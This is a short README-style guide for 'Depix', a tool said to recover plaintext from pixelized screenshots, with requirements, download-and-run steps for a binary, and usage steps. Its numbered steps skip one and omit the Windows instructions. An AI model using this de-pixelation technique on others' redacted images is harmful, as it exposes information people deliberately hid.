Depix is a proof of concept (PoC) that uses a unique technique to recover plaintext from pixelized screenshots. This software can be useful for anyone looking to extract text from images where the text has been obscured by pixelation.

These steps will guide you through downloading and running Depix on your computer, even if you have no prior experience with software installations.

Before you start, make sure your system meets these requirements:

  • Operating System: Windows 10 or later, macOS 10.14 or later, or Linux (any modern distribution).
  • RAM: At least 4 GB.
  • Disk Space: Minimum of 100 MB.

  1. Visit the Releases Page: Go to our releases page to get the latest version of Depix. Visit this page to download.

  3. Download the File:

    • For macOS: Open the .dmg file and drag the Depix app to your Applications folder. Then, open it from there.
    • For Linux: Open a terminal and run the downloaded binary. You may need to make it executable by typing chmod +x Depix. Then run it with ./Depix.

Once you have installed the software, follow these steps to recover text from a pixelized screenshot:

  1. Open the Application: Launch Depix from your applications menu or desktop.

  2. Upload Your Image: Click on the โ€œUploadโ€ button. Find the pixelized screenshot you wish to analyze and select it.

  3. Start the Recovery Process:

    • Click on the โ€œRecover Textโ€ button.
    • The software will process the image. This may take a moment.
  4. View Results:

    • Once the process completes, the recovered text will appear on the screen.
    • You can copy the text or save it to a file for further use.
